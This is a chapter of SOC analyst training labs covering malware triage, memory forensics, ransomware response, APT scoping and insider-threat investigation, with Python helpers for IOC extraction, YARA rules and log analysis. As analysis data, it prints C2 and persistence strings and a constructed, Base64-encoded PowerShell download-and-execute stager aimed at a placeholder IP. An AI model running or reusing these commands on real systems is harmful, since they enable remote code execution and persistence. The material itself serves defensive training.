L2 Advanced Hands-On

CHAPTER 9: L2 HANDS-ON SCENARIOS


Lab: Malware Triage

Scenario: EDR detects a suspicious file on an endpoint. L1 has already validated it as a true positive and isolated the host. As L2 you are asked to perform malware triage.

Step 1: Collect Artifact

# Pull the file from EDR quarantine or from the endpoint
File:     update_service.exe
Location: C:\Users\Public\Downloads\
Size:     847 KB
SHA256:   3a7b9c2d...

Step 2: Static Analysis

# Hash lookup
VirusTotal: 52/71 detections → "Trojan.Emotet"
# Looking up the hash discloses nothing sensitive; uploading the file itself to a public service does

# File metadata
Compile time: 2 days ago (fresh compile, possibly targeted?)
Packer: UPX detected → unpack first (on a copy, inside the analysis VM): upx -d update_service.exe

# Strings analysis (after unpacking)
strings output:
  "http://193.42.xx.xx/gate.php"                       ← C2 URL
  "Content-Type: multipart/form-data"                  ← data exfil via HTTP POST
  "Software\\Microsoft\\Windows\\CurrentVersion\\Run"  ← Run-key persistence
  "cmd.exe /c schtasks /create"                        ← scheduled-task persistence

# PE imports
InternetOpenA, HttpSendRequestA   ← HTTP C2
RegSetValueExA                    ← registry persistence
CreateToolhelp32Snapshot          ← process enumeration

Step 3: Dynamic Analysis (Sandbox)

# Any.run / sandbox results
Process tree:
  update_service.exe
  ├── cmd.exe → schtasks.exe /create /tn "UpdateSvc" /tr "C:\Users\Public\update_service.exe" /sc minute /mo 5
  └── rundll32.exe → injected into svchost.exe

Network:
  DNS: api-update.servegame[.]com → 193.42.xx.xx
  HTTP POST to 193.42.xx.xx/gate.php (every 60 s = beacon interval)
  HTTP POST body contains base64-encoded system info

File system / registry:
  Created:  C:\Users\Public\update_service.exe (copy to the persistence location)
  Modified: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateSvc

Anti-analysis:
  Checks for vmtoolsd.exe, VBoxService.exe (VM detection)
  Sleep(120000) before C2 communication (2-minute delay)
# A 2-minute pre-C2 sleep can outlast a short sandbox run: extend the run time or the network IOCs never appear

Step 4: IOC Extraction & Actions

IOC LIST:
  Hash:   3a7b9c2d... (SHA256)
  IP:     193.42.xx.xx
  Domain: api-update.servegame[.]com
  URL:    http://193.42.xx.xx/gate.php
  File:   C:\Users\Public\update_service.exe
  RegKey: HKCU\...\Run\UpdateSvc
  Task:   UpdateSvc (scheduled task)

ACTIONS:
  1. Block the IP and domain at the firewall and in DNS
  2. Hunt: search for the IOCs across the whole environment (SIEM + EDR)
  3. Eradicate: remove the file, the registry key and the scheduled task
  4. Write a YARA rule to detect variants
  5. Create a Sigma rule for the behavioural pattern
  6. Update the SIEM correlation rules
  7. Share the IOCs via MISP/TIP
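Steps 2 and 4 above (strings analysis, IOC extraction, YARA rule) can be scripted so the same triage produces a defanged IOC list and a first-cut hunting rule. The block below is an added example written for this chapter, not code from the original lab: the strings output is constructed (the IP 193.42.10.20, task name and path are placeholders standing in for the masked values above), the import-to-capability mapping and the short TLD list are assumptions, and the generated YARA rule is a starting point to be tested against a clean corpus before deployment.

```python
import re

# Constructed `strings` output modelled on Step 2 of the lab. This is NOT the
# real sample's output: the IP, task name and path are illustrative placeholders.
STRINGS_OUTPUT = [
    r"!This program cannot be run in DOS mode.",
    r"http://193.42.10.20/gate.php",
    r"Content-Type: multipart/form-data",
    r"Software\Microsoft\Windows\CurrentVersion\Run",
    r"cmd.exe /c schtasks /create /tn UpdateSvc /tr C:\Users\Public\update_service.exe /sc minute /mo 5",
    r"api-update.servegame.com",
    r"InternetOpenA",
    r"HttpSendRequestA",
    r"RegSetValueExA",
    r"CreateToolhelp32Snapshot",
]

# Assumed analyst heuristic: imported API -> capability it usually indicates.
IMPORT_CAPABILITIES = {
    "InternetOpenA": "HTTP C2",
    "HttpSendRequestA": "HTTP C2",
    "RegSetValueExA": "registry persistence",
    "CreateToolhelp32Snapshot": "process enumeration",
    "WriteProcessMemory": "process injection",
    "CreateRemoteThread": "process injection",
}

PATTERNS = {
    "urls": re.compile(r"https?://[^\s\"'<>]+"),
    "ips": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    # Deliberately short TLD list: a permissive domain regex is very noisy on binary strings.
    "domains": re.compile(r"\b(?:[a-z0-9-]+\.)+(?:com|net|org|info|xyz|top)\b", re.I),
    "registry": re.compile(r"Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?"),
    "tasks": re.compile(r"schtasks\s+/create.*"),
    "files": re.compile(r"[A-Za-z]:\\(?:[^\\\s]+\\)*[^\\\s]+\.exe"),
}


def extract_iocs(lines):
    """Run every pattern over the strings output; keep first-seen order, drop duplicates."""
    found = {name: [] for name in PATTERNS}
    for line in lines:
        for name, pat in PATTERNS.items():
            found[name].extend(pat.findall(line))
    return {name: list(dict.fromkeys(vals)) for name, vals in found.items()}


def defang(ioc):
    """Make an IOC safe to paste into tickets: http -> hxxp, '.' -> '[.]' in the host part only."""
    m = re.match(r"(https?://)([^/]+)(.*)", ioc)
    if m:
        return m.group(1).replace("http", "hxxp") + m.group(2).replace(".", "[.]") + m.group(3)
    return ioc.replace(".", "[.]")


def classify_imports(lines):
    """Map imports seen in the strings / PE import table to the capability they suggest."""
    return {s: IMPORT_CAPABILITIES[s] for s in lines if s in IMPORT_CAPABILITIES}


def build_yara(rule_name, sha256, iocs):
    """Emit a variant-hunting YARA rule from the C2 and persistence strings (Step 4, action 4)."""
    strings = []
    for i, s in enumerate(iocs["urls"] + iocs["domains"] + iocs["registry"] + iocs["tasks"]):
        esc = s.replace("\\", "\\\\").replace('"', '\\"')   # YARA string escaping
        strings.append(f'        $s{i} = "{esc}" ascii wide')
    body = "\n".join(strings)
    return (
        f"rule {rule_name}\n"
        "{\n"
        "    meta:\n"
        '        description = "Variants sharing the triaged sample\'s C2 and persistence strings"\n'
        f'        hash = "{sha256}"\n'
        "    strings:\n"
        f"{body}\n"
        "    condition:\n"
        "        uint16(0) == 0x5A4D and 3 of them\n"   # MZ header + 3 of the 4 strings
        "}\n"
    )


if __name__ == "__main__":
    iocs = extract_iocs(STRINGS_OUTPUT)
    for kind, values in iocs.items():
        for v in values:
            print(f"{kind:9s} {defang(v)}")
    print(classify_imports(STRINGS_OUTPUT))
    print(build_yara("Trojan_UpdateSvc_Variant", "<sha256 from Step 1>", iocs))
```

The rule requires the MZ header plus three of the four strings, so a variant that changes only the C2 URL still fires; the host name in a Run-key value or the `schtasks` command line is deliberately not included, since those legitimately appear in many binaries.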

Lab: Memory Forensics Investigation

Scenario: An endpoint shows C2 activity but EDR/AV finds no malware on disk. Fileless malware is suspected. A memory dump was taken before isolation.
# Step 1: Process listing, look for anomalies
vol3 -f infected.raw windows.pstree

# Suspicious findings:
PID   PPID  Name            Path
...
4892  3204  powershell.exe  ← spawned by WINWORD.EXE (PID 3204)
5120  4892  rundll32.exe    ← spawned by PowerShell
5344  5120  svchost.exe     ← spawned by rundll32: ABNORMAL!
# A normal svchost parent is services.exe, not rundll32!

# Step 2: Check the command line
vol3 -f infected.raw windows.cmdline --pid 4892
powershell.exe -nop -w hidden -enc SQBFAF...
# -enc is Base64 of the UTF-16LE command text: decode it to see what actually ran

# Step 3: Check for injected code
vol3 -f infected.raw windows.malfind --pid 5344
Process: svchost.exe  PID: 5344
Protection: PAGE_EXECUTE_READWRITE   ← RWX permission = code injection!
MZ header found in the injected memory region → PE injected into svchost

# Step 4: Dump the injected code
vol3 -f infected.raw windows.malfind --pid 5344 --dump
# Submit the dumped PE to VirusTotal → "Cobalt Strike Beacon"

# Step 5: Network connections from the suspicious process
vol3 -f infected.raw windows.netscan | grep 5344
svchost.exe  5344  TCP  10.0.0.55:49832 → 198.51.100.33:443  ESTABLISHED  ← C2 connection from the injected svchost!
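The parent-child judgements in Steps 1 and 2 are mechanical enough to script, which matters when the pstree output has hundreds of rows rather than the three shown. The block below is an added example for this chapter, not part of the original lab: the process list is constructed to mirror the PIDs above, the expected-parent baseline is an assumption (typical of a default Windows 10 image; tune it per environment), and the encoded PowerShell payload is an invented stager built the way `-enc` expects (Base64 over UTF-16LE, which is why a real `-enc` blob beginning with `IEX` starts with `SQBFAF`, as in the lab output).

```python
import base64
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid name cmdline")

# Constructed stand-in for the decoded stager (invented URL in a TEST-NET range).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.33/a')"
# -EncodedCommand takes Base64 of the UTF-16LE command text, so build it that way.
ENC = base64.b64encode(STAGER.encode("utf-16le")).decode()

# Constructed process list modelled on the vol3 pstree/cmdline findings above;
# the suspicious PIDs match the lab, everything else is illustrative.
PROCESSES = [
    Proc(4, 0, "System", ""),
    Proc(540, 4, "wininit.exe", "wininit.exe"),
    Proc(624, 540, "services.exe", r"C:\Windows\system32\services.exe"),
    Proc(680, 540, "lsass.exe", r"C:\Windows\system32\lsass.exe"),
    Proc(812, 624, "svchost.exe", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    Proc(2120, 2000, "explorer.exe", r"C:\Windows\explorer.exe"),
    Proc(3204, 2120, "WINWORD.EXE", r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n invoice.docm'),
    Proc(4892, 3204, "powershell.exe", "powershell.exe -nop -w hidden -enc " + ENC),
    Proc(5120, 4892, "rundll32.exe", r"rundll32.exe C:\Users\Public\stage.dll,Start"),
    Proc(5344, 5120, "svchost.exe", r"C:\Windows\system32\svchost.exe"),
]

# Assumed baseline: expected parent(s) for core Windows processes (lower-case names).
EXPECTED_PARENT = {
    "svchost.exe": {"services.exe"},
    "lsass.exe": {"wininit.exe"},
    "services.exe": {"wininit.exe"},
}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -enc payload, or None if the command line has none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16le")


def find_anomalies(procs):
    """Apply the Step 1-2 heuristics: wrong parent, Office spawning a script host, hidden+encoded PowerShell."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        pname = parent.name.lower() if parent else "<unknown>"
        expected = EXPECTED_PARENT.get(p.name.lower())
        if expected and pname not in expected:
            findings.append((p.pid, f"{p.name} parented by {pname}, expected {sorted(expected)}"))
        if pname in OFFICE_APPS and p.name.lower() in SCRIPT_HOSTS:
            findings.append((p.pid, f"{pname} spawned {p.name}"))
        if p.name.lower() == "powershell.exe" and "hidden" in p.cmdline.lower() and ENC_FLAG.search(p.cmdline):
            findings.append((p.pid, f"hidden, encoded PowerShell: {decode_encoded_command(p.cmdline)}"))
    return findings


def ancestry(procs, pid):
    """Walk PPIDs upward; return the chain of names from the oldest known ancestor down to pid."""
    by_pid = {p.pid: p for p in procs}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # stop at an exited/unknown parent or a PID loop
        seen.add(pid)
        chain.append(by_pid[pid].name)
        pid = by_pid[pid].ppid
    return list(reversed(chain))


if __name__ == "__main__":
    for pid, msg in find_anomalies(PROCESSES):
        print(pid, msg)
    print(" -> ".join(ancestry(PROCESSES, 5344)))
```

Running it flags exactly the two PIDs the analyst flagged by eye (4892 twice, 5344 once), prints the decoded stager, and reproduces the attack chain listed in the conclusion from the PPID links alone. The legitimate svchost (PID 812) and lsass are not reported because their parents match the baseline.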

Conclusion

Attack chain: Word macro → PowerShell (encoded) → rundll32 (loader) → process injection into svchost.exe → Cobalt Strike Beacon → C2 communication over HTTPS. Fileless: the payload exists only in memory and is never written to disk, so traditional AV cannot detect it.

Lab: Ransomware Incident Response

Scenario: At 03:00 AM, monitoring alerts show multiple file servers undergoing mass file renames to the extension .lockbit3. A ransom note is found in every directory.

Immediate Actions (First 30 Minutes)

PRIORITY 1: STOP THE SPREAD
├── Isolate all affected servers from the network IMMEDIATELY
├── Disable the affected service accounts
├── Block lateral movement: disable SMB (port 445) between servers where possible
├── DO NOT shut down: preserve memory evidence
└── Take memory dumps from the affected servers

PRIORITY 2: SCOPE ASSESSMENT
├── How many servers are affected?
├── Which data is encrypted?
├── Are the backups affected? (backup servers are frequently targeted!)
├── Is a domain controller compromised?
└── Any sign of data exfiltration before encryption? (double extortion)

Investigation

# Check initial access: when did the attacker first get in?
SIEM query: look for login anomalies 7-30 days before the encryption
# Ransomware is usually deployed only after the attacker has been in the network for days

# Check the lateral movement path
Event 4648 + Event 4624 logon type 3/10, starting from the first infected host
# Build a timeline: Host A → Host B → DC → File Servers

# Check persistence and tooling
Event 7045 (service install)   → PsExec, ransomware service
Event 4698 (scheduled task)    → scheduled deployment
Event 1102 (log cleared)       → anti-forensics

# Check data exfiltration (pre-encryption)
Proxy/FW logs: look for large uploads to cloud storage, FTP or unfamiliar IPs
DNS logs: look for DNS tunneling patterns

# Ransom note analysis
Ransomware family: LockBit 3.0
Decryptor: check nomoreransom.org, a free decryptor may exist
Payment: DO NOT pay without consulting legal and management
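The lateral-movement and tooling checks above amount to one pass over the Security/System event logs of every host in scope. The block below is an added example for this chapter, not part of the original lab: the events are constructed (hosts, accounts, times and IPs in RFC 5737 test ranges are invented, with encryption starting on FS01 at 03:00 to match the scenario), the IP-to-host inventory is assumed, and the event field names follow the standard Windows event schema (`TargetUserName`, `IpAddress`, `LogonType`, `ServiceName`, `ImagePath`, `TaskName`).

```python
from datetime import datetime

# Constructed Windows Security/System events modelled on the investigation steps
# above. Everything here is invented; times are ISO strings so they sort lexically.
EVENTS = [
    {"time": "2024-05-01T02:14:00", "host": "WS-ALICE", "id": 4624, "LogonType": 10,
     "TargetUserName": "alice", "IpAddress": "203.0.113.7"},            # external RDP = initial access
    {"time": "2024-05-03T23:40:00", "host": "WS-ALICE", "id": 4648,
     "TargetUserName": "svc_backup", "TargetServerName": "SRV-APP01"},  # explicit-credential use
    {"time": "2024-05-03T23:40:05", "host": "SRV-APP01", "id": 4624, "LogonType": 3,
     "TargetUserName": "svc_backup", "IpAddress": "10.0.0.10"},
    {"time": "2024-05-03T23:41:00", "host": "SRV-APP01", "id": 7045,
     "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"time": "2024-05-05T01:10:00", "host": "DC01", "id": 4624, "LogonType": 3,
     "TargetUserName": "svc_backup", "IpAddress": "10.0.0.20"},
    {"time": "2024-05-05T01:12:00", "host": "DC01", "id": 4698,
     "TaskName": r"\Deploy", "Command": r"\\DC01\netlogon\lb.exe"},
    {"time": "2024-05-06T02:58:00", "host": "FS01", "id": 4624, "LogonType": 3,
     "TargetUserName": "Administrator", "IpAddress": "10.0.0.30"},
    {"time": "2024-05-06T02:59:00", "host": "FS01", "id": 7045,
     "ServiceName": "WinUpdateSvc", "ImagePath": r"C:\Windows\Temp\lb.exe"},
    {"time": "2024-05-06T03:05:00", "host": "FS01", "id": 1102,
     "SubjectUserName": "Administrator"},
]
# Assumed asset inventory: source IP -> hostname. Unmapped sources are treated as external.
IP_TO_HOST = {"10.0.0.10": "WS-ALICE", "10.0.0.20": "SRV-APP01", "10.0.0.30": "DC01"}
ENCRYPTION_START = "2024-05-06T03:00:00"


def _sorted(events):
    return sorted(events, key=lambda e: e["time"])


def lateral_movement_hops(events, ip_to_host):
    """Hops from 4624 logons of type 3 (network) and 10 (RDP): (time, account, src, dst)."""
    hops = []
    for e in _sorted(events):
        if e["id"] == 4624 and e.get("LogonType") in (3, 10):
            src = ip_to_host.get(e["IpAddress"], f"external:{e['IpAddress']}")
            hops.append((e["time"], e["TargetUserName"], src, e["host"]))
    return hops


def movement_path(hops):
    """Hosts in the order the attacker reached them (de-duplicated)."""
    return list(dict.fromkeys(h[3] for h in hops))


def compromised_accounts(hops):
    """Every account used for a remote logon along the path: the credential-reset list."""
    return {h[1] for h in hops}


def tooling_findings(events):
    """Remote-execution tooling and anti-forensics from 7045 / 4698 / 1102."""
    out = []
    for e in _sorted(events):
        if e["id"] == 7045:
            tag = "PsExec service" if e["ServiceName"].upper() == "PSEXESVC" else "service install"
            out.append((e["time"], e["host"], f"{tag}: {e['ServiceName']} -> {e['ImagePath']}"))
        elif e["id"] == 4698:
            out.append((e["time"], e["host"], f"scheduled task: {e['TaskName']} -> {e['Command']}"))
        elif e["id"] == 1102:
            out.append((e["time"], e["host"], f"security log cleared by {e['SubjectUserName']} (anti-forensics)"))
    return out


def dwell_time(events, encryption_start):
    """Time between the earliest event in the set and the start of encryption."""
    first = min(datetime.fromisoformat(e["time"]) for e in events)
    return datetime.fromisoformat(encryption_start) - first


if __name__ == "__main__":
    hops = lateral_movement_hops(EVENTS, IP_TO_HOST)
    print("Path:", " -> ".join(movement_path(hops)))
    print("Accounts to reset:", sorted(compromised_accounts(hops)))
    for t, h, msg in tooling_findings(EVENTS):
        print(t, h, msg)
    print("Dwell time before encryption:", dwell_time(EVENTS, ENCRYPTION_START))
```

On the constructed data the path comes out as WS-ALICE → SRV-APP01 → DC01 → FS01 with a five-day dwell time, and the 1102 on FS01 after encryption started is the reason to pull the memory dump and EDR telemetry rather than rely on that host's event log. Note that a cleared log removes the 4624 records you need, so in practice the SIEM copy, not the host copy, is the source.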

Recovery Decision Tree

Condition                     Action
Backups exist and are clean   Restore from backup after eradication and hardening
Backups are also encrypted    Check offline backups, cloud backups and shadow copies (ransomware commonly deletes shadow copies first; verify before relying on them)
Free decryptor available      Check nomoreransom.org and vendor security advisories
No recovery option            Consult management and legal about the options (including negotiation as a last resort)

Lab: APT Investigation

Scenario: The threat intel team receives a report that an IP address linked to an APT group is actively targeting your industry. One endpoint is found to have been communicating with that IP for 2 weeks.

Investigation Approach

PHASE 1: SCOPE (don't alert the adversary)
├── Find ALL endpoints that connect to the C2 IP (SIEM + netflow)
├── Check DNS logs: other domains that resolve to that IP
├── EDR: query every endpoint for the related IOCs (file hash, mutex, named-pipe names)
├── Don't isolate yet: we need the full scope before containment
└── An APT attacker probably has a backup C2: if we block one, they move to the other

PHASE 2: TIMELINE RECONSTRUCTION
├── Initial access: when was the first contact? (proxy logs, email logs)
├── Lateral movement: which hosts were visited?
├── Persistence: which mechanisms were installed?
├── Credential access: which accounts were compromised?
├── Collection: which data was accessed/collected?
└── Exfiltration: has data already left?

PHASE 3: COORDINATED CONTAINMENT
# APT containment must be simultaneous; if the attacker notices, they can:
#   - destroy evidence
#   - switch to a backup C2
#   - deploy destructive malware
#   - accelerate exfiltration
├── Block ALL known C2 (IP, domain, JA3 hash) at the same time
├── Isolate ALL compromised endpoints together
├── Reset ALL potentially compromised credentials
├── Disable ALL persistence mechanisms
└── Engage an external IR firm if needed (APT = serious)
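Phase 1 is a pivot: one known C2 IP leads, through DNS logs, to the domains that resolved to it, then to the other IPs those domains have resolved to (the backup C2), and finally to every host that touched any of them. The block below is an added example for this chapter, not code from the original lab: the netflow and DNS records are constructed (hosts, the invented domain example-telemetry.net and IPs in RFC 5737 test ranges are placeholders), and it assumes DNS logs record the answer IP alongside the query, which is what makes the pivot possible.

```python
# Constructed netflow and DNS-query records modelled on Phase 1. All hosts, domains
# and IPs are placeholders; 192.0.2.10 / www.example.com represent benign traffic.
FLOWS = [  # (time, src_host, dst_ip, dst_port, bytes_out)
    ("2024-04-01T10:00", "WS-017", "203.0.113.50", 443, 1200),
    ("2024-04-02T10:00", "WS-017", "203.0.113.50", 443, 900),
    ("2024-04-03T09:30", "WS-042", "203.0.113.50", 443, 1500),
    ("2024-04-10T11:00", "WS-042", "198.51.100.77", 443, 700),    # C2 moved to a backup IP
    ("2024-04-11T08:00", "WS-101", "198.51.100.77", 443, 600),
    ("2024-04-11T08:05", "WS-200", "192.0.2.10", 443, 50000),     # benign
]
DNS = [  # (time, host, qname, answer)
    ("2024-04-01T09:59", "WS-017", "cdn-sync.example-telemetry.net", "203.0.113.50"),
    ("2024-04-03T09:29", "WS-042", "cdn-sync.example-telemetry.net", "203.0.113.50"),
    ("2024-04-10T10:59", "WS-042", "cdn-sync.example-telemetry.net", "198.51.100.77"),
    ("2024-04-11T07:59", "WS-101", "update-cache.example-telemetry.net", "198.51.100.77"),
    ("2024-04-11T08:04", "WS-200", "www.example.com", "192.0.2.10"),
]


def expand_scope(flows, dns, seed_ip):
    """Pivot IP -> domains -> IPs until nothing new appears, then collect every host that touched the set."""
    ips, domains = {seed_ip}, set()
    while True:
        new_domains = {q for _, _, q, a in dns if a in ips} - domains
        domains |= new_domains
        new_ips = {a for _, _, q, a in dns if q in domains} - ips
        ips |= new_ips
        if not new_domains and not new_ips:   # fixpoint reached
            break
    hosts = {h for _, h, ip, _, _ in flows if ip in ips} | {h for _, h, q, _ in dns if q in domains}
    return {"ips": ips, "domains": domains, "hosts": hosts}


def first_last_seen(flows, ips):
    """Per host, first and last contact with any C2 IP: the starting point for the Phase 2 timeline."""
    seen = {}
    for t, host, ip, _, _ in sorted(flows):
        if ip in ips:
            first, _ = seen.get(host, (t, t))
            seen[host] = (first, t)
    return seen


def bytes_out_per_host(flows, ips):
    """Outbound volume to C2 per host; a large figure is the first hint of exfiltration."""
    totals = {}
    for _, host, ip, _, out in flows:
        if ip in ips:
            totals[host] = totals.get(host, 0) + out
    return totals


if __name__ == "__main__":
    scope = expand_scope(FLOWS, DNS, "203.0.113.50")
    print("Block list:", sorted(scope["ips"]), sorted(scope["domains"]))
    print("Isolate together:", sorted(scope["hosts"]))
    print("First/last seen:", first_last_seen(FLOWS, scope["ips"]))
    print("Bytes out:", bytes_out_per_host(FLOWS, scope["ips"]))
```

Seeded with the one IP from the intel report, the pivot surfaces the backup C2 (198.51.100.77), a second domain, and a third host (WS-101) that never contacted the original IP at all. Blocking only the reported IP would have left WS-042 and WS-101 talking to the backup, which is the Phase 3 point: the whole set has to be blocked and isolated at once.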

Lab: Insider Threat Investigation

Scenario: HR reports that a senior engineer who is about to resign was detected by DLP accessing code repositories that do not belong to their team and copying files to a USB drive.

Investigation (coordinate with HR & Legal)

EVIDENCE COLLECTION:

# 1. DLP logs
USB device:   SanDisk Ultra (Serial: XXX)
Files copied: 47 files, 2.3 GB total
File types:   .py, .yaml, .pem, .env, .sql
Timestamp:    after hours (21:00-22:30)

# 2. Code repository access logs
Repos accessed outside normal scope:
  - /product-alpha/ml-models        (AI/ML intellectual property)
  - /infrastructure/secrets-vault   (credential store!)
  - /finance/pricing-engine
Normal access: /backend/api-service only

# 3. Email/communication review (with Legal approval)
Emails sent to a personal address with attachments? → check the email gateway logs
Cloud upload activity? → check the proxy for personal Drive/Dropbox

# 4. Badge/physical access
After-hours building access on dates matching the DLP alerts

IMPORTANT RULES:
✗ DO NOT confront the employee directly: that is HR/Legal's responsibility
✗ DO NOT access personal email or devices without legal approval
✓ DO preserve all evidence with chain of custody
✓ DO document everything objectively: facts only, no assumptions
✓ DO coordinate the timing of the account disable with HR (exit interview)
✓ DO treat any copied .pem/.env material and secrets-vault contents as compromised and plan their rotation